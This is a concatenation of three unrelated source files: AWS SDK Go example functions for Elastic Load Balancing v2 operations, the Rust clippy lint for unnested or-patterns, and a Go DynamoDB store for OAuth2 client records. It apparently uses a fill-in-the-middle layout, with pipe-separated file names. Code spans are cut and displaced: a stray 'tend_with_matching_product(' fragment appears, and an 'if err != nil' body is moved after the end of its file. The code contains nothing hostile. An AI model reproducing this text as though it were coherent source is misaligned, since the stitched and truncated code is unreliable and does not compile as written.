LoadBalancerArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:loadbalancer/app/my-load-balancer/50dc6c495c0c9188"),
}
result, err := svc.ModifyLoadBalancerAttributes(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeLoadBalancerNotFoundException:
fmt.Println(elbv2.ErrCodeLoadBalancerNotFoundException, aerr.Error())
case elbv2.ErrCodeInvalidConfigurationRequestException:
fmt.Println(elbv2.ErrCodeInvalidConfigurationRequestException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To modify a rule
//
// This example modifies the condition for the specified rule.
func ExampleELBV2_ModifyRule_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.ModifyRuleInput{
Conditions: []*elbv2.RuleCondition{
{
Field: aws.String("path-pattern"),
Values: []*string{
aws.String("/images/*"),
},
},
},
RuleArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:listener-rule/app/my-load-balancer/50dc6c495c0c9188/f2f7dc8efc522ab2/9683b2d02a6cabee"),
}
result, err := svc.ModifyRule(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeTargetGroupAssociationLimitException:
fmt.Println(elbv2.ErrCodeTargetGroupAssociationLimitException, aerr.Error())
case elbv2.ErrCodeIncompatibleProtocolsException:
fmt.Println(elbv2.ErrCodeIncompatibleProtocolsException, aerr.Error())
case elbv2.ErrCodeRuleNotFoundException:
fmt.Println(elbv2.ErrCodeRuleNotFoundException, aerr.Error())
case elbv2.ErrCodeOperationNotPermittedException:
fmt.Println(elbv2.ErrCodeOperationNotPermittedException, aerr.Error())
case elbv2.ErrCodeTooManyRegistrationsForTargetIdException:
fmt.Println(elbv2.ErrCodeTooManyRegistrationsForTargetIdException, aerr.Error())
case elbv2.ErrCodeTooManyTargetsException:
fmt.Println(elbv2.ErrCodeTooManyTargetsException, aerr.Error())
case elbv2.ErrCodeTargetGroupNotFoundException:
fmt.Println(elbv2.ErrCodeTargetGroupNotFoundException, aerr.Error())
case elbv2.ErrCodeUnsupportedProtocolException:
fmt.Println(elbv2.ErrCodeUnsupportedProtocolException, aerr.Error())
case elbv2.ErrCodeTooManyActionsException:
fmt.Println(elbv2.ErrCodeTooManyActionsException, aerr.Error())
case elbv2.ErrCodeInvalidLoadBalancerActionException:
fmt.Println(elbv2.ErrCodeInvalidLoadBalancerActionException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To modify the health check configuration for a target group
//
// This example changes the configuration of the health checks used to evaluate the
// health of the targets for the specified target group.
func ExampleELBV2_ModifyTargetGroup_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.ModifyTargetGroupInput{
HealthCheckPort: aws.String("443"),
HealthCheckProtocol: aws.String("HTTPS"),
TargetGroupArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:targetgroup/my-https-targets/2453ed029918f21f"),
}
result, err := svc.ModifyTargetGroup(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeTargetGroupNotFoundException:
fmt.Println(elbv2.ErrCodeTargetGroupNotFoundException, aerr.Error())
case elbv2.ErrCodeInvalidConfigurationRequestException:
fmt.Println(elbv2.ErrCodeInvalidConfigurationRequestException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To modify the deregistration delay timeout
//
// This example sets the deregistration delay timeout to the specified value for the
// specified target group.
func ExampleELBV2_ModifyTargetGroupAttributes_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.ModifyTargetGroupAttributesInput{
Attributes: []*elbv2.TargetGroupAttribute{
{
Key: aws.String("deregistration_delay.timeout_seconds"),
Value: aws.String("600"),
},
},
TargetGroupArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067"),
}
result, err := svc.ModifyTargetGroupAttributes(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeTargetGroupNotFoundException:
fmt.Println(elbv2.ErrCodeTargetGroupNotFoundException, aerr.Error())
case elbv2.ErrCodeInvalidConfigurationRequestException:
fmt.Println(elbv2.ErrCodeInvalidConfigurationRequestException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To register targets with a target group
//
// This example registers the specified instances with the specified target group.
func ExampleELBV2_RegisterTargets_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.RegisterTargetsInput{
TargetGroupArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067"),
Targets: []*elbv2.TargetDescription{
{
Id: aws.String("i-80c8dd94"),
},
{
Id: aws.String("i-ceddcd4d"),
},
},
}
result, err := svc.RegisterTargets(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeTargetGroupNotFoundException:
fmt.Println(elbv2.ErrCodeTargetGroupNotFoundException, aerr.Error())
case elbv2.ErrCodeTooManyTargetsException:
fmt.Println(elbv2.ErrCodeTooManyTargetsException, aerr.Error())
case elbv2.ErrCodeInvalidTargetException:
fmt.Println(elbv2.ErrCodeInvalidTargetException, aerr.Error())
case elbv2.ErrCodeTooManyRegistrationsForTargetIdException:
fmt.Println(elbv2.ErrCodeTooManyRegistrationsForTargetIdException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To register targets with a target group using port overrides
//
// This example registers the specified instance with the specified target group using
// multiple ports. This enables you to register ECS containers on the same instance
// as targets in the target group.
func ExampleELBV2_RegisterTargets_shared01() {
svc := elbv2.New(session.New())
input := &elbv2.RegisterTargetsInput{
TargetGroupArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:targetgroup/my-new-targets/3bb63f11dfb0faf9"),
Targets: []*elbv2.TargetDescription{
{
Id: aws.String("i-80c8dd94"),
Port: aws.Int64(80),
},
{
Id: aws.String("i-80c8dd94"),
Port: aws.Int64(766),
},
},
}
result, err := svc.RegisterTargets(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeTargetGroupNotFoundException:
fmt.Println(elbv2.ErrCodeTargetGroupNotFoundException, aerr.Error())
case elbv2.ErrCodeTooManyTargetsException:
fmt.Println(elbv2.ErrCodeTooManyTargetsException, aerr.Error())
case elbv2.ErrCodeInvalidTargetException:
fmt.Println(elbv2.ErrCodeInvalidTargetException, aerr.Error())
case elbv2.ErrCodeTooManyRegistrationsForTargetIdException:
fmt.Println(elbv2.ErrCodeTooManyRegistrationsForTargetIdException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To remove tags from a load balancer
//
// This example removes the specified tags from the specified load balancer.
func ExampleELBV2_RemoveTags_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.RemoveTagsInput{
ResourceArns: []*string{
aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:loadbalancer/app/my-load-balancer/50dc6c495c0c9188"),
},
TagKeys: []*string{
aws.String("project"),
aws.String("department"),
},
}
result, err := svc.RemoveTags(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeLoadBalancerNotFoundException:
fmt.Println(elbv2.ErrCodeLoadBalancerNotFoundException, aerr.Error())
case elbv2.ErrCodeTargetGroupNotFoundException:
fmt.Println(elbv2.ErrCodeTargetGroupNotFoundException, aerr.Error())
case elbv2.ErrCodeListenerNotFoundException:
fmt.Println(elbv2.ErrCodeListenerNotFoundException, aerr.Error())
case elbv2.ErrCodeRuleNotFoundException:
fmt.Println(elbv2.ErrCodeRuleNotFoundException, aerr.Error())
case elbv2.ErrCodeTooManyTagsException:
fmt.Println(elbv2.ErrCodeTooManyTagsException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To set the rule priority
//
// This example sets the priority of the specified rule.
func ExampleELBV2_SetRulePriorities_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.SetRulePrioritiesInput{
RulePriorities: []*elbv2.RulePriorityPair{
{
Priority: aws.Int64(5),
RuleArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:listener-rule/app/my-load-balancer/50dc6c495c0c9188/f2f7dc8efc522ab2/1291d13826f405c3"),
},
},
}
result, err := svc.SetRulePriorities(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeRuleNotFoundException:
fmt.Println(elbv2.ErrCodeRuleNotFoundException, aerr.Error())
case elbv2.ErrCodePriorityInUseException:
fmt.Println(elbv2.ErrCodePriorityInUseException, aerr.Error())
case elbv2.ErrCodeOperationNotPermittedException:
fmt.Println(elbv2.ErrCodeOperationNotPermittedException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To associate a security group with a load balancer
//
// This example associates the specified security group with the specified load balancer.
func ExampleELBV2_SetSecurityGroups_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.SetSecurityGroupsInput{
LoadBalancerArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:loadbalancer/app/my-load-balancer/50dc6c495c0c9188"),
SecurityGroups: []*string{
aws.String("sg-5943793c"),
},
}
result, err := svc.SetSecurityGroups(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeLoadBalancerNotFoundException:
fmt.Println(elbv2.ErrCodeLoadBalancerNotFoundException, aerr.Error())
case elbv2.ErrCodeInvalidConfigurationRequestException:
fmt.Println(elbv2.ErrCodeInvalidConfigurationRequestException, aerr.Error())
case elbv2.ErrCodeInvalidSecurityGroupException:
fmt.Println(elbv2.ErrCodeInvalidSecurityGroupException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To enable Availability Zones for a load balancer
//
// This example enables the Availability Zones for the specified subnets for the specified
// load balancer.
func ExampleELBV2_SetSubnets_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.SetSubnetsInput{
LoadBalancerArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:loadbalancer/app/my-load-balancer/50dc6c495c0c9188"),
Subnets: []*string{
aws.String("subnet-8360a9e7"),
aws.String("subnet-b7d581c0"),
},
}
result, err := svc.SetSubnets(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeLoadBalancerNotFoundException:
fmt.Println(elbv2.ErrCodeLoadBalancerNotFoundException, aerr.Error())
case elbv2.ErrCodeInvalidConfigurationRequestException:
fmt.Println(elbv2.ErrCodeInvalidConfigurationRequestException, aerr.Error())
case elbv2.ErrCodeSubnetNotFoundException:
fmt.Println(elbv2.ErrCodeSubnetNotFoundException, aerr.Error())
case elbv2.ErrCodeInvalidSubnetException:
fmt.Println(elbv2.ErrCodeInvalidSubnetException, aerr.Error())
case elbv2.ErrCodeAllocationIdNotFoundException:
fmt.Println(elbv2.ErrCodeAllocationIdNotFoundException, aerr.Error())
case elbv2.ErrCodeAvailabilityZoneNotSupportedException:
fmt.Println(elbv2.ErrCodeAvailabilityZoneNotSupportedException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
unnested_or_patterns.rs | #![allow(clippy::wildcard_imports, clippy::enum_glob_use)]
use clippy_utils::ast_utils::{eq_field_pat, eq_id, eq_maybe_qself, eq_pat, eq_path};
use clippy_utils::diagnostics::span_lint_and_then;
use clippy_utils::{meets_msrv, msrvs, over};
use rustc_ast::mut_visit::*;
use rustc_ast::ptr::P;
use rustc_ast::{self as ast, Mutability, Pat, PatKind, PatKind::*, DUMMY_NODE_ID};
use rustc_ast_pretty::pprust;
use rustc_errors::Applicability;
use rustc_lint::{EarlyContext, EarlyLintPass};
use rustc_semver::RustcVersion;
use rustc_session::{declare_tool_lint, impl_lint_pass};
use rustc_span::DUMMY_SP;
use std::cell::Cell;
use std::mem;
declare_clippy_lint! {
/// ### What it does
/// Checks for unnested or-patterns, e.g., `Some(0) | Some(2)` and
/// suggests replacing the pattern with a nested one, `Some(0 | 2)`.
///
/// Another way to think of this is that it rewrites patterns in
/// *disjunctive normal form (DNF)* into *conjunctive normal form (CNF)*.
///
/// ### Why is this bad?
/// In the example above, `Some` is repeated, which unnecessarily complicates the pattern.
///
/// ### Example
/// ```rust
/// fn main() {
/// if let Some(0) | Some(2) = Some(0) {}
/// }
/// ```
/// Use instead:
/// ```rust
/// fn main() {
/// if let Some(0 | 2) = Some(0) {}
/// }
/// ```
#[clippy::version = "1.46.0"]
pub UNNESTED_OR_PATTERNS,
pedantic,
"unnested or-patterns, e.g., `Foo(Bar) | Foo(Baz) instead of `Foo(Bar | Baz)`"
}
#[derive(Clone, Copy)]
pub struct UnnestedOrPatterns {
msrv: Option<RustcVersion>,
}
impl UnnestedOrPatterns {
#[must_use]
pub fn new(msrv: Option<RustcVersion>) -> Self {
Self { msrv }
}
}
impl_lint_pass!(UnnestedOrPatterns => [UNNESTED_OR_PATTERNS]);
impl EarlyLintPass for UnnestedOrPatterns {
fn check_arm(&mut self, cx: &EarlyContext<'_>, a: &ast::Arm) {
if meets_msrv(self.msrv.as_ref(), &msrvs::OR_PATTERNS) {
lint_unnested_or_patterns(cx, &a.pat);
}
}
fn check_expr(&mut self, cx: &EarlyContext<'_>, e: &ast::Expr) {
if meets_msrv(self.msrv.as_ref(), &msrvs::OR_PATTERNS) {
if let ast::ExprKind::Let(pat, _, _) = &e.kind {
lint_unnested_or_patterns(cx, pat);
}
}
}
fn check_param(&mut self, cx: &EarlyContext<'_>, p: &ast::Param) {
if meets_msrv(self.msrv.as_ref(), &msrvs::OR_PATTERNS) {
lint_unnested_or_patterns(cx, &p.pat);
}
}
fn check_local(&mut self, cx: &EarlyContext<'_>, l: &ast::Local) {
if meets_msrv(self.msrv.as_ref(), &msrvs::OR_PATTERNS) {
lint_unnested_or_patterns(cx, &l.pat);
}
}
extract_msrv_attr!(EarlyContext);
}
fn lint_unnested_or_patterns(cx: &EarlyContext<'_>, pat: &Pat) {
if let Ident(.., None) | Lit(_) | Wild | Path(..) | Range(..) | Rest | MacCall(_) = pat.kind {
// This is a leaf pattern, so cloning is unprofitable.
return;
}
let mut pat = P(pat.clone());
// Nix all the paren patterns everywhere so that they aren't in our way.
remove_all_parens(&mut pat);
// Transform all unnested or-patterns into nested ones, and if there were none, quit.
if !unnest_or_patterns(&mut pat) {
return;
}
span_lint_and_then(cx, UNNESTED_OR_PATTERNS, pat.span, "unnested or-patterns", |db| {
insert_necessary_parens(&mut pat);
db.span_suggestion_verbose(
pat.span,
"nest the patterns",
pprust::pat_to_string(&pat),
Applicability::MachineApplicable,
);
});
}
/// Remove all `(p)` patterns in `pat`.
fn remove_all_parens(pat: &mut P<Pat>) {
struct Visitor;
impl MutVisitor for Visitor {
fn visit_pat(&mut self, pat: &mut P<Pat>) {
noop_visit_pat(pat, self);
let inner = match &mut pat.kind {
Paren(i) => mem::replace(&mut i.kind, Wild),
_ => return,
};
pat.kind = inner;
}
}
Visitor.visit_pat(pat);
}
/// Insert parens where necessary according to Rust's precedence rules for patterns.
fn insert_necessary_parens(pat: &mut P<Pat>) {
struct Visitor;
impl MutVisitor for Visitor {
fn visit_pat(&mut self, pat: &mut P<Pat>) {
use ast::{BindingMode::*, Mutability::*};
noop_visit_pat(pat, self);
let target = match &mut pat.kind {
// `i @ a | b`, `box a | b`, and `& mut? a | b`.
Ident(.., Some(p)) | Box(p) | Ref(p, _) if matches!(&p.kind, Or(ps) if ps.len() > 1) => p,
Ref(p, Not) if matches!(p.kind, Ident(ByValue(Mut), ..)) => p, // `&(mut x)`
_ => return,
};
target.kind = Paren(P(take_pat(target)));
}
}
Visitor.visit_pat(pat);
}
/// Unnest or-patterns `p0 | ... | p1` in the pattern `pat`.
/// For example, this would transform `Some(0) | FOO | Some(2)` into `Some(0 | 2) | FOO`.
fn unnest_or_patterns(pat: &mut P<Pat>) -> bool {
struct Visitor {
changed: bool,
}
impl MutVisitor for Visitor {
fn visit_pat(&mut self, p: &mut P<Pat>) {
// This is a bottom up transformation, so recurse first.
noop_visit_pat(p, self);
// Don't have an or-pattern? Just quit early on.
let alternatives = match &mut p.kind {
Or(ps) => ps,
_ => return,
};
// Collapse or-patterns directly nested in or-patterns.
let mut idx = 0;
let mut this_level_changed = false;
while idx < alternatives.len() {
let inner = if let Or(ps) = &mut alternatives[idx].kind {
mem::take(ps)
} else {
idx += 1;
continue;
};
this_level_changed = true;
alternatives.splice(idx..=idx, inner);
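// `idx` is intentionally not advanced here, so the spliced-in
// alternatives are re-examined on the next loop iteration.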
}
// Focus on `p_n` and then try to transform all `p_i` where `i > n`.
let mut focus_idx = 0;
while focus_idx < alternatives.len() {
this_level_changed |= transform_with_focus_on_idx(alternatives, focus_idx);
focus_idx += 1;
}
self.changed |= this_level_changed;
// Deal with `Some(Some(0)) | Some(Some(1))`.
if this_level_changed {
noop_visit_pat(p, self);
}
}
}
let mut visitor = Visitor { changed: false };
visitor.visit_pat(pat);
visitor.changed
}
/// Match `$scrutinee` against `$pat` and extract `$then` from it.
/// Panics if there is no match.
macro_rules! always_pat {
($scrutinee:expr, $pat:pat => $then:expr) => {
match $scrutinee {
$pat => $then,
_ => unreachable!(),
}
};
}
/// Focus on `focus_idx` in `alternatives`,
/// attempting to extend it with elements of the same constructor `C`
/// in `alternatives[focus_idx + 1..]`.
fn transform_with_focus_on_idx(alternatives: &mut Vec<P<Pat>>, focus_idx: usize) -> bool {
// Extract the kind; we'll need to make some changes in it.
let mut focus_kind = mem::replace(&mut alternatives[focus_idx].kind, PatKind::Wild);
// We'll focus on `alternatives[focus_idx]`,
// so we're draining from `alternatives[focus_idx + 1..]`.
let start = focus_idx + 1;
// We're trying to find whatever kind (~"constructor") we found in `alternatives[start..]`.
let changed = match &mut focus_kind {
// These pattern forms are "leafs" and do not have sub-patterns.
// Therefore they are not some form of constructor `C`,
// with which a pattern `C(p_0)` may be formed,
// which we would want to join with other `C(p_j)`s.
Ident(.., None) | Lit(_) | Wild | Path(..) | Range(..) | Rest | MacCall(_)
// Skip immutable refs, as grouping them saves few characters,
// and almost always requires adding parens (increasing noisiness).
// In the case of only two patterns, replacement adds net characters.
| Ref(_, Mutability::Not)
// Dealt with elsewhere.
| Or(_) | Paren(_) => false,
// Transform `box x | ... | box y` into `box (x | y)`.
//
// The cases below until `Slice(...)` deal with *singleton* products.
// These patterns have the shape `C(p)`, and not e.g., `C(p0, ..., pn)`.
Box(target) => extend_with_matching(
target, start, alternatives,
|k| matches!(k, Box(_)),
|k| always_pat!(k, Box(p) => p),
),
// Transform `&mut x | ... | &mut y` into `&mut (x | y)`.
Ref(target, Mutability::Mut) => extend_with_matching(
target, start, alternatives,
|k| matches!(k, Ref(_, Mutability::Mut)),
|k| always_pat!(k, Ref(p, _) => p),
),
// Transform `b @ p0 | ... b @ p1` into `b @ (p0 | p1)`.
Ident(b1, i1, Some(target)) => extend_with_matching(
target, start, alternatives,
// Binding names must match.
|k| matches!(k, Ident(b2, i2, Some(_)) if b1 == b2 && eq_id(*i1, *i2)),
|k| always_pat!(k, Ident(_, _, Some(p)) => p),
),
// Transform `[pre, x, post] | ... | [pre, y, post]` into `[pre, x | y, post]`.
Slice(ps1) => extend_with_matching_product(
ps1, start, alternatives,
|k, ps1, idx| matches!(k, Slice(ps2) if eq_pre_post(ps1, ps2, idx)),
|k| always_pat!(k, Slice(ps) => ps),
),
// Transform `(pre, x, post) | ... | (pre, y, post)` into `(pre, x | y, post)`.
Tuple(ps1) => extend_with_matching_product(
ps1, start, alternatives,
|k, ps1, idx| matches!(k, Tuple(ps2) if eq_pre_post(ps1, ps2, idx)),
|k| always_pat!(k, Tuple(ps) => ps),
),
// Transform `S(pre, x, post) | ... | S(pre, y, post)` into `S(pre, x | y, post)`.
TupleStruct(qself1, path1, ps1) => extend_with_matching_product(
ps1, start, alternatives,
|k, ps1, idx| matches!(
k,
TupleStruct(qself2, path2, ps2)
if eq_maybe_qself(qself1, qself2) && eq_path(path1, path2) && eq_pre_post(ps1, ps2, idx)
),
|k| always_pat!(k, TupleStruct(_, _, ps) => ps),
),
// Transform a record pattern `S { fp_0, ..., fp_n }`.
Struct(qself1, path1, fps1, rest1) => extend_with_struct_pat(qself1, path1, fps1, *rest1, start, alternatives),
};
alternatives[focus_idx].kind = focus_kind;
changed
}
/// Here we focus on a record pattern `S { fp_0, ..., fp_n }`.
/// In particular, for a record pattern, the order in which the field patterns appear is irrelevant.
/// So when we fixate on some `ident_k: pat_k`, we try to find `ident_k` in the other pattern
/// and check that all `fp_i` where `i ∈ ((0...n) \ k)` are equal between the two patterns.
fn extend_with_struct_pat(
qself1: &Option<ast::QSelf>,
path1: &ast::Path,
fps1: &mut [ast::PatField],
rest1: bool,
start: usize,
alternatives: &mut Vec<P<Pat>>,
) -> bool {
(0..fps1.len()).any(|idx| {
let pos_in_2 = Cell::new(None); // The element `k`.
let tail_or = drain_matching(
start,
alternatives,
|k| {
matches!(k, Struct(qself2, path2, fps2, rest2)
if rest1 == *rest2 // If one struct pattern has `..` so must the other.
&& eq_maybe_qself(qself1, qself2)
&& eq_path(path1, path2)
&& fps1.len() == fps2.len()
&& fps1.iter().enumerate().all(|(idx_1, fp1)| {
if idx_1 == idx {
// In the case of `k`, we merely require identical field names
// so that we will transform into `ident_k: p1_k | p2_k`.
let pos = fps2.iter().position(|fp2| eq_id(fp1.ident, fp2.ident));
pos_in_2.set(pos);
pos.is_some()
} else {
fps2.iter().any(|fp2| eq_field_pat(fp1, fp2))
}
}))
},
// Extract `p2_k`.
|k| always_pat!(k, Struct(_, _, mut fps, _) => fps.swap_remove(pos_in_2.take().unwrap()).pat),
);
extend_with_tail_or(&mut fps1[idx].pat, tail_or)
})
}
/// Like `extend_with_matching` but for products with > 1 factor, e.g., `C(p_0, ..., p_n)`.
/// Here, the idea is that we fixate on some `p_k` in `C`,
/// allowing it to vary between two `targets` and `ps2` (returned by `extract`),
/// while also requiring `ps1[..n] ~ ps2[..n]` (pre) and `ps1[n + 1..] ~ ps2[n + 1..]` (post),
/// where `~` denotes semantic equality.
fn extend_with_matching_product(
targets: &mut [P<Pat>],
start: usize,
alternatives: &mut Vec<P<Pat>>,
predicate: impl Fn(&PatKind, &[P<Pat>], usize) -> bool,
extract: impl Fn(PatKind) -> Vec<P<Pat>>,
) -> bool {
(0..targets.len()).any(|idx| {
let tail_or = drain_matching(
start,
alternatives,
|k| predicate(k, targets, idx),
|k| extract(k).swap_remove(idx),
);
extend_with_tail_or(&mut targets[idx], tail_or)
})
}
/// Extract the pattern from the given one and replace it with `Wild`.
/// This is meant for temporarily swapping out the pattern for manipulation.
fn take_pat(from: &mut Pat) -> Pat {
let dummy = Pat {
id: DUMMY_NODE_ID,
kind: Wild,
span: DUMMY_SP,
tokens: None,
};
mem::replace(from, dummy)
}
/// Extend `target` as an or-pattern with the alternatives
/// in `tail_or` if there are any and return if there were.
fn extend_with_tail_or(target: &mut Pat, tail_or: Vec<P<Pat>>) -> bool {
fn extend(target: &mut Pat, mut tail_or: Vec<P<Pat>>) {
match target {
// On an existing or-pattern in the target, append to it.
Pat { kind: Or(ps), .. } => ps.append(&mut tail_or),
// Otherwise convert the target to an or-pattern.
target => {
let mut init_or = vec![P(take_pat(target))];
init_or.append(&mut tail_or);
target.kind = Or(init_or);
},
}
}
let changed = !tail_or.is_empty();
if changed {
// Extend the target.
extend(target, tail_or);
}
changed
}
/// Extract all inner patterns in `alternatives` matching our `predicate`.
/// Only elements beginning with `start` are considered for extraction.
fn drain_matching(
start: usize,
alternatives: &mut Vec<P<Pat>>,
predicate: impl Fn(&PatKind) -> bool,
extract: impl Fn(PatKind) -> P<Pat>,
) -> Vec<P<Pat>> {
let mut tail_or = vec![];
let mut idx = 0;
for pat in alternatives.drain_filter(|p| {
// Check if we should extract, but only if `idx >= start`.
idx += 1;
idx > start && predicate(&p.kind)
}) {
tail_or.push(extract(pat.into_inner().kind));
}
tail_or
}
fn extend_with_matching(
target: &mut Pat,
start: usize,
alternatives: &mut Vec<P<Pat>>,
predicate: impl Fn(&PatKind) -> bool,
extract: impl Fn(PatKind) -> P<Pat>,
) -> bool {
extend_with_tail_or(target, drain_matching(start, alternatives, predicate, extract))
}
/// Are the patterns in `ps1` and `ps2` equal save for `ps1[idx]` compared to `ps2[idx]`?
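/// For example (illustrative), with `idx = 1` the slices `[x, 0, z]` and
/// `[x, 1, z]` pass this check: the prefixes `[x]` and suffixes `[z]` are equal.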
fn eq_pre_post(ps1: &[P<Pat>], ps2: &[P<Pat>], idx: usize) -> bool {
ps1.len() == ps2.len()
&& ps1[idx].is_rest() == ps2[idx].is_rest() // Avoid `[x, ..] | [x, 0]` => `[x, .. | 0]`.
&& over(&ps1[..idx], &ps2[..idx], |l, r| eq_pat(l, r))
&& over(&ps1[idx + 1..], &ps2[idx + 1..], |l, r| eq_pat(l, r))
}
| tend_with_matching_product(
|
client.go | package dynamodb
import (
"errors"
"fmt"
"os"
"github.com/aws/aws-sdk-go/aws"
"github.com/aws/aws-sdk-go/aws/awserr"
"github.com/aws/aws-sdk-go/service/dynamodb"
"github.com/aws/aws-sdk-go/service/dynamodb/dynamodbattribute"
"gopkg.in/oauth2.v3"
"gopkg.in/oauth2.v3/models"
)
// ClientConfig client configuration parameters
type ClientConfig struct {
// store clients data collection name(The default is oauth2_clients)
ClientsCName string
}
// ClientStore DynamoDB storage for OAuth 2.0
type ClientStore struct {
ccfg *ClientConfig
dbName string
client *dynamodb.DynamoDB
}
// NewDefaultClientConfig create a default client configuration
func NewDefaultClientConfig() *ClientConfig {
return &ClientConfig{
ClientsCName: "oauth2_clients",
}
}
func initClientTable(client *dynamodb.DynamoDB, clientConfig *ClientConfig) (err error) {
// Create authorization code table
input := &dynamodb.CreateTableInput{
AttributeDefinitions: []*dynamodb.AttributeDefinition{
{
AttributeName: aws.String("ID"),
AttributeType: aws.String("S"),
},
},
KeySchema: []*dynamodb.KeySchemaElement{
{
AttributeName: aws.String("ID"),
KeyType: aws.String("HASH"),
},
},
ProvisionedThroughput: &dynamodb.ProvisionedThroughput{
ReadCapacityUnits: aws.Int64(10),
WriteCapacityUnits: aws.Int64(10),
},
TableName: &clientConfig.ClientsCName,
}
_, err = client.CreateTable(input)
if err != nil |
return
}
// NewClientStore create a client store instance based on dynamodb
func NewClientStore(client *dynamodb.DynamoDB, ccfg *ClientConfig) (store *ClientStore) {
initClientTable(client, ccfg)
store = &ClientStore{
ccfg: ccfg,
client: client,
}
return
}
// Set set client information
func (cs *ClientStore) Set(info oauth2.ClientInfo) (err error) {
params := &dynamodb.PutItemInput{
TableName: aws.String(cs.ccfg.ClientsCName),
Item: map[string]*dynamodb.AttributeValue{
"ID": {
S: aws.String(info.GetID()),
},
"Secret": {
S: aws.String(info.GetSecret()),
},
"Domain": {
S: aws.String(info.GetDomain()),
},
"UserID": {
S: aws.String(info.GetUserID()),
},
},
ConditionExpression: aws.String("attribute_not_exists(ID)"),
}
_, err = cs.client.PutItem(params)
return
}
// GetByID according to the ID for the client information
func (cs *ClientStore) GetByID(id string) (info oauth2.ClientInfo, err error) {
input := &dynamodb.GetItemInput{
Key: map[string]*dynamodb.AttributeValue{
"ID": {
S: aws.String(id),
},
},
TableName: aws.String(cs.ccfg.ClientsCName),
}
result, err := cs.client.GetItem(input)
// Check the request error before inspecting the item, so a failed
// call is not masked as a missing client.
if err != nil {
return
}
if len(result.Item) == 0 {
err = errors.New("no such client id")
return
}
var infoC models.Client
err = dynamodbattribute.UnmarshalMap(result.Item, &infoC)
info = &infoC
return
}
// RemoveByID use the client id to delete the client information
func (cs *ClientStore) RemoveByID(id string) (err error) {
input := &dynamodb.DeleteItemInput{
Key: map[string]*dynamodb.AttributeValue{
"ID": {
S: aws.String(id),
},
},
TableName: aws.String(cs.ccfg.ClientsCName),
ConditionExpression: aws.String("attribute_exists(ID)"),
}
_, err = cs.client.DeleteItem(input)
return
}
| {
if awsErr, ok := err.(awserr.Error); ok {
switch awsErr.Code() {
case dynamodb.ErrCodeResourceInUseException:
break
default:
fmt.Println("Got error calling CreateTable for clients:")
fmt.Println(awsErr.Error())
os.Exit(1)
}
}
} |
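// Illustrative usage sketch (assumed region, credentials and client values;
// not part of the original source). It additionally assumes the import
// "github.com/aws/aws-sdk-go/aws/session":
//
// sess := session.Must(session.NewSession(&aws.Config{Region: aws.String("us-east-1")}))
// store := NewClientStore(dynamodb.New(sess), NewDefaultClientConfig())
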